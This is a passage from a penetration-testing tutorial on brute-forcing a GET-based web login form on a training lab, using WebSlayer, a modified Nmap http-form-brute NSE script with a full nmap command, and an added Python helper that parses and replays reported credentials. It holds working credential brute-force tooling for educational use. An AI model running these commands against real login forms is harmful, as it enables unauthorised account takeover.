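To run it against a live target, replace lab_responder with a function that fetches the expanded URL (for example with urllib.request.urlopen) and returns the status and body; the dictionary case is just fuzz(TEMPLATE, open("passwords.txt").read().split()). The 'retry' verdict is the important design choice: a script that reports success whenever the failure string is absent will also report success for an empty or error response.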


Once Start is hit, we are taken to the Attack Results tab:

Below we can Stop or Pause the current attack and watch the payload processing:

Once everything finishes, a green row shows the successful break of the password for the given email parameter value admin@pentesteracademy.com, with the password value that went through the payload processing in place of FUZZ:


Here we see that the payload (it appears in this copy as zzz) is the one whose response MD5 stands out from the rest; from here we can hit Response HTML to verify that the login with the supplied username and this password was cracked:

Use the same payload extracted at this point to log in via the original browser, and the same result is achieved. There are, however, plenty more options in WebSlayer in the Payload Generator tab, where apart from combination and permutation generation a variety of payloads can be generated, including block payload generation, credit-card payload generation, username generation (useful for the enumeration part) and numerical payload generation:


improvements to the Nmap Project. Nmap is available for Linux as well as for Windows. It also works on Mac, but with various lags in speed; benchmarks show Nmap running slower on Mac than on a Linux based operating system. There is complete documentation on Nmap and how to use it, which can be found here. Here's a book by Fyodor himself on Nmap. In case anyone needs a very thorough understanding of Nmap, follow the book. If you need it only for penetration testing tasks or as a tool-set for quick and dirty pentests from a network, mail me at [email protected]; there's an ongoing research document which I have been preparing.

Nmap can scan for open ports and detect a host's operating system remotely. It can also detect application versions, and has signatures preset for recognizing applications, OS and other daemon versions. It does host discovery, operating system enumeration, report generation using XML standards and firewall evasion on the go. It has both CLI and GUI versions; the GUI version of Nmap is known as Zenmap. When it comes to scanning, network enumeration and fingerprinting, Nmap is the first favourite choice of any dedicated red team, used as a Swiss army knife (the same goes for Netcat!).

Nmap has an engine called the Nmap Scripting Engine (NSE). The engine is documented here and its scripts are written in the Lua language. Apart from Nmap itself, NSE provides the flexibility to take on additional tasks like automating an exploit or actually exploiting a target, and provides a range of capabilities such as enumeration, vulnerability detection and much more. Read the documentation. In Kali Linux, which is an operating system based on Debian, the Nmap scripts reside in the /usr/share/nmap/scripts directory:

Before we go into using the NSE engine to bruteforce web based form logins, there are certain things which you'd need to know:

1.  The NSE is completely community based and its scripts are written in Lua.

2.  As of August 2014, there was no script shipped with Nmap which assisted bruteforcing web based logins using the GET method.

3.  I had to manually change the Lua code in the NSE file and implement it into a currently working script for Nmap, which was http-form-brute.nse. Credits to nnposter on Nmap development.

4.  By default, as of August 2014, this particular script only used the POST method and there was no support for GET based web form bruteforce, and hence the code needed to be modified in order to support both methods. (Upstream http-form-brute.nse has since gained an http-form-brute.method argument; check the version shipped with your Nmap before patching it.)

5.  The code which will be documented here isn't a part of penetration testing and is wholly devoted to scripting the NSE and then using this newly developed/modified Lua script to identify GET based form authentication and assist bruteforcing it.

6.  The script will be covered here and might be in a patch release later; hence the original script requires a backup before we replace it with our own modified Lua script.

7.  NSE uses script arguments, and there are different script arguments for different scripts. The code presented here adds yet another argument to the list apart from what was originally offered. Because the script provided support for the POST method and not GET, in modifying the script to our own needs I had to go ahead and add an additional argument called http-form-brute.method, which takes GET or POST as input, to make sure that the request method is declared before we start bruteforcing the target application.

8.  The modified script itself is not stable as for now. It gives false positives, which is currently being worked against. But over several tests it showed 70% positives with the tested methods above, which proves that it can crack credentials. If the credentials generated by this script go wrong, trial and error is used against the application to get the right credentials. Nmap developers are fixing this.

9.  Update the Nmap script database at a later time (with revisions after 2014) to make the best use of it. This is the first ever documented script and a functional one for the attempt we are going to make. Don't focus on the script and move directly to the pentest part if you do not understand Lua or can't code one.

 

Backing up the original script is easy: copy the existing original script and store it in the same directory for later use:


Now one would need to update the original script with the code provided here. A raw version can be found here. Since we have backed up our original script code for http-form-brute.nse, we can go ahead and replace the original script code with the script code provided here, because this new script provides new functionality, including the choice of POST or GET as the HTTP request method.

Copy the code from the raw version of the ASCII text code in Lua provided here and paste it into the editor of choice. Make sure the name stays the same, that is http-form-brute.nse. After pasting this new code, press CTRL+O to save the code in nano and hit carriage return (Enter), and then CTRL+X to exit the editor. The following screenshot shows the demonstration of the code which has been developed, using nano as the text editor of choice. For new users, leafpad, which comes along with Kali, would be fine, or gedit, which can be installed via apt-get install gedit on the command line.

It's recommended for experienced Lua coders to go through the code and modify it if any changes are needed, in accordance with the needs of the pentester. Also mail me if there is something you modify, since I'd be interested to keep track of the changes in the code.


Now that we have everything set up with the replaced code, we need to trigger Nmap from the command line with a crafted NSE script invocation and its arguments. The script arguments are something which most find tricky. Keeping everything else aside, once you realize the way Nmap script arguments are passed via the CLI, the true power lies there for quick exploitation as well as quick tests. NSE provides a variety of scripts for checks, exploitation, enumeration and a vast database for automating tasks. This document again does not discuss Nmap in detail; I'd rather jump over to using NSE for bruteforcing web application forms which might be GET based HTTP requests. A GET request is something which is imprinted on the URL, which in this case is:

https://pentesteracademylab.appspot.com/lab/webapp/1?email=test&password=test

Both the username, which is the email parameter, and the password, which is the password parameter, are being passed in clear text on the URL, which means the request method is GET. This could also be verified using the view-source which was discussed earlier in this document.


Knowing how to trigger Nmap with the -sC switch and using --script with --script-args: there's a difference between running the -sC switch and targeting a specific application using a specific NSE script. The general -sC switch does a default script run, which is equivalent to --script=default.

After the application has been mapped, to use the power of the NSE script to our advantage we need the more specific script which we developed earlier in Lua to be run by Nmap. In order to accomplish this, we need to trigger the script with the --script= directive and mention the script name. Nmap takes care of the rest and automatically looks in the /usr/share/nmap/scripts directory, hence no .nse extension is required when naming the script. First, the main target is specified along with the port to be targeted; web servers run on port 80 by default and our target pentesteracademylab.appspot.com has the same port open, serving web content from an HTTP server. Then come the script arguments, several of which are newly introduced by the modified script; these are all the arguments one needs to pass to the script (http-form-brute.nse):

1.  http-form-brute.hostname – Specifies the hostname.

2.  http-form-brute.path – Specifies the path URI.

3.  http-form-brute.method – Specifies the web form method (GET or POST).

4.  http-form-brute.uservar – Specifies the name of the form field for the username.

5.  http-form-brute.passvar – Specifies the name of the form field for the password.

6.  userdb – The file of line-feed separated usernames for the bruteforce.

7.  passdb – The file of line-feed separated passwords for the bruteforce.

These arguments are supposed to be mentioned in the crafted query for Nmap when --script=http-form-brute with --script-args is declared. All of the script args go inside single quotes.

Now that we understand the format for specifying the Nmap arguments, I need to show some of the common mistakes one could run into when writing the query for Nmap. These are stated here so that these mistakes can be dealt with in no time, and when the audience writes the query for the first time, he/she feels confident enough. Some of the points worth mentioning while writing the script argument queries are the following:

1.  --script=script-name-here declares the script an attacker is using. Here it's http-form-brute, and hence this is --script=http-form-brute.

2.  To specify the arguments the script requires, one declares --script-args='argument.specifics="value",argument.specifics="value"', which takes all the arguments inside '' (single quotes); within these single quotes are the argument names like http-form-brute.method, http-form-brute.path, http-form-brute.hostname and everything else. The argument names are separated by , (comma).

3.  The values of the desired argument names go inside double quotes, as shown above in point [2]. The userdb and passdb arguments in this scenario take their input from a file; the double quotes around a plain path are optional, though they can be provided.

4.  Using the -n switch before starting the script analysis means the attacker doesn't want Nmap to do DNS resolution (Nmap's "No DNS resolution" option).

5.  The -p switch mentions the port to be scanned. I wanted to scan port 80, which is the specific target port which serves the web application and is open. So -p80 is sufficient for the NSE script to go ahead and bruteforce that port and none else. Other ports could be specified via -p with a comma-separated list.

6.  As usual with Nmap, the attacker must specify the target host (not the whole URI). Nmap accepts the target anywhere on the command line; in this case it comes first: the target host pentesteracademylab.appspot.com, then the port, then the -n switch, then the script one needs to use, which in this case is http-form-brute, and then the script arguments.

7.  Last but not least, for convenience the attacker also specifies the -vvv switch at the end, which stands for extra verbosity. A single -v would have been less verbose, -vv less verbose compared to -vvv, and hence I specified a high level of verbosity so that we can go through the results while Nmap is still bruteforcing.


Triggering Nmap with the crafted query for the modified http-form-brute: I have mentioned what needed attention in order to craft the query. With everything clear, I go ahead and craft the following query for our modified version of the Nmap NSE script:

nmap pentesteracademylab.appspot.com -n -p80 --script=http-form-brute \
  --script-args='http-form-brute.path="/lab/webapp/1",http-form-brute.hostname="pentesteracademylab.appspot.com",http-form-brute.method="GET",passdb="/root/Desktop/pentesteracademy/challenge1/passwords.txt",userdb="/root/Desktop/pentesteracademy/challenge1/users.txt",http-form-brute.passvar=password,http-form-brute.uservar=email' \
  -vvv

The crafted query is simple unless one looks at its length. Nmap takes the target host pentesteracademylab.appspot.com, and with the -n switch I specified that we need not do DNS queries; next I mention the target port, which is 80, and then --script=http-form-brute, which is the modified script under the /usr/share/nmap/scripts/ directory. Then I give --script-args=, providing the script the arguments required for the target, separated by commas and enclosed in single quotes as discussed above; the values of these arguments are enclosed in double quotes. Finally I ask for verbose output while Nmap is running; this is optional and not required, but I like to have the full results for a quicker look during a penetration test.

Everything would look like the following:

The original query is attached above. If you don't understand what it's doing, I suggest reading this section again rather than copying the query and pasting it into the terminal for results; that would defeat everything being documented here. Apart from that, when Nmap finishes, the results would be as follows:

1.  It will go ahead and target the specified port.

2.  It will load the Nmap script specified.

3.  It will attempt to request the specified URI which the script mentions.

4.  The usernames will be taken from userdb.

5.  The passwords will be taken from passdb.

6.  The form variable for the username will be taken from uservar.

7.  The form variable for the password will be taken from passvar.

8.  It will adjust the endpoints and GET will be used to bruteforce these endpoints.

9.  Optionally one could also store the results in XML format (-oX).


The bruteforce will take time, since it is a bruteforce:

Depending on the network, it would take time to bring the results back; the results vary and hence may require trial and error. This happens due to packets being sent too slowly or due to time lags. False positives are common with the modified script.


As the audience sees in the result, these are false positives which were caught by the modified Lua script; with some trial and error, one should be able to get the right credentials. As this is being documented, Nmap developers are working on the current Lua script for better detection. With a fast connection, the false positives are minimized. This happens due to the TCP packets being sent at a low rate and therefore the response from the web server arriving malformed; it's due to network bottlenecks. The practical lesson is the same either way: a script that declares success whenever the failure string is absent will also declare success for a timed-out, truncated or error response, so every credential a brute-force tool reports must be replayed against the login form and confirmed before it is trusted.
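Assembling the invocation and checking its results in code, as an added example that is not part of the original document or of Nmap: build_nmap_argv renders --script-args in the format described above (comma-separated key="value" pairs, single-quoted for the shell by shell_command, plus -oX to keep the XML), parse_http_form_brute pulls every 'Valid credentials' line out of that XML, and verify replays each pair against the login form so that a false positive from the script never reaches the report. The XML sample is constructed to mimic Nmap's output format (the 'user:pass - Valid credentials' line format is that of NSE's brute library; treat it as an assumption if your Nmap version differs), lab_login is a stand-in for the form so the example runs offline, and the password xyzzy is made up.

```python
"""Added example (not from the original document): assemble the http-form-brute
run, parse its XML output and replay every reported credential before
believing it."""
import shlex
import xml.etree.ElementTree as ET

VALID = "- Valid credentials"   # suffix the NSE brute library prints per hit (assumed format)


def script_args(pairs):
    """Render --script-args as the document describes: comma-separated
    key="value" pairs.  The shell quoting is added separately so that the
    double quotes reach Nmap intact."""
    return "--script-args=" + ",".join('%s="%s"' % (k, v) for k, v in pairs.items())


def build_nmap_argv(host, port, args, xml_out="brute.xml"):
    """argv for the brute-force run; -oX keeps the results as XML."""
    return ["nmap", host, "-n", "-p%d" % port, "--script=http-form-brute",
            script_args(args), "-oX", xml_out, "-vvv"]


def shell_command(argv):
    """The same argv as one shell line, with --script-args single-quoted."""
    return shlex.join(argv)


def parse_http_form_brute(xml_text):
    """Return (user, password) pairs from every http-form-brute <script>
    element.  Nmap stores the human-readable script output in the 'output'
    attribute; the per-line format is assumed from the brute library."""
    creds = []
    for script in ET.fromstring(xml_text).iter("script"):
        if script.get("id") != "http-form-brute":
            continue
        for line in script.get("output", "").splitlines():
            line = line.strip()
            if line.endswith(VALID):
                user, _, password = line[:-len(VALID)].strip().partition(":")
                creds.append((user, password))
    return creds


def verify(creds, send, failure_marker="Failed!"):
    """Replay each pair; keep it only if a real page came back without the
    failure marker.  An empty or non-200 response is not a hit."""
    confirmed = []
    for user, password in creds:
        status, body = send(user, password)
        if status == 200 and body and failure_marker not in body:
            confirmed.append((user, password))
    return confirmed


# --- constructed stand-ins so the example runs offline ----------------------
_SECRET = {"admin@pentesteracademy.com": "xyzzy"}   # made-up lab password


def lab_login(user, password):
    """Stand-in for GET /lab/webapp/1?email=...&password=... on the lab."""
    if _SECRET.get(user) == password:
        return 200, "<html>Welcome</html>"
    return 200, "<html>Failed!</html>"


# Constructed sample in Nmap's XML layout: one real hit and one false positive.
SAMPLE_XML = """<nmaprun scanner="nmap">
 <host><address addr="203.0.113.10" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
   <script id="http-form-brute" output="Accounts: &#10;  admin@pentesteracademy.com:xyzzy - Valid credentials&#10;  jack@pentesteracademy.com:xxxxx - Valid credentials&#10;Statistics: Performed 486 guesses in 60 seconds, average tps: 8"/>
  </port></ports>
 </host>
</nmaprun>"""

if __name__ == "__main__":
    argv = build_nmap_argv("pentesteracademylab.appspot.com", 80, {
        "http-form-brute.path": "/lab/webapp/1",
        "http-form-brute.hostname": "pentesteracademylab.appspot.com",
        "http-form-brute.method": "GET",
        "http-form-brute.uservar": "email",
        "http-form-brute.passvar": "password",
        "userdb": "users.txt",
        "passdb": "passwords.txt",
    })
    print(shell_command(argv))
    reported = parse_http_form_brute(SAMPLE_XML)
    print("reported :", reported)
    print("confirmed:", verify(reported, lab_login))
```

Replace lab_login with a function that issues the real GET request to use this against a target; the verify step is what turns the script's 70% hit rate into a list that can be put in a report.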

That marks the conclusion of this document, and I hope the audience gets a vision of how to carry out different attacks via the same attack vector but with different approaches. The point of this document is not to show how things are exploited so that you get credentials; that could be done either way. The point is to show how many ways a pentester could go about breaking the web application to suit his/her objectives. This is a series of documents to follow.